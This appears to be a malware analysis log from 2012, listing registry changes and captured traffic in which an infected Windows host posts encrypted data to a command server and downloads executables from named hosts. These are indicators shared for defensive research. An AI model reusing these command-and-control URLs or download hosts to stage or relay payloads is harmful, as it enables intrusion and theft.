HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006
==============================================
EVIL NETWORK CONNECTIVITIES..............
==============================================
(1)POST /forum/viewtopic.php HTTP/1.0
Host: 108.178.59.34
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 255
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
=C.f..<.\......B.*HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 17 Oct 2012 04:17:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0
-----------
(2)GET /Z2U.exe HTTP/1.0
Host: 3073.a.hostable.me
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:13:17 GMT
Server: Apache
Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdownload
MZ......................@..........................................
.....!..L.!This program cannot be run in DOS mode.
$.......PE..L...
----------------------------------------
(3)GET /PNV3Hbi.exe HTTP/1.0
Host: 85.18.21.252
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:09:24 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
ETag: "242fca-63658-4cc3963d6a094"
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdos-program
MZ......................@...............................................!
This program cannot be run in DOS mode.$.......PE..L....(~P..............
.Z....................@.......................... ......................
......................................................................U..
..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
.E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".
#MalwareMustDie!!!!!!!!!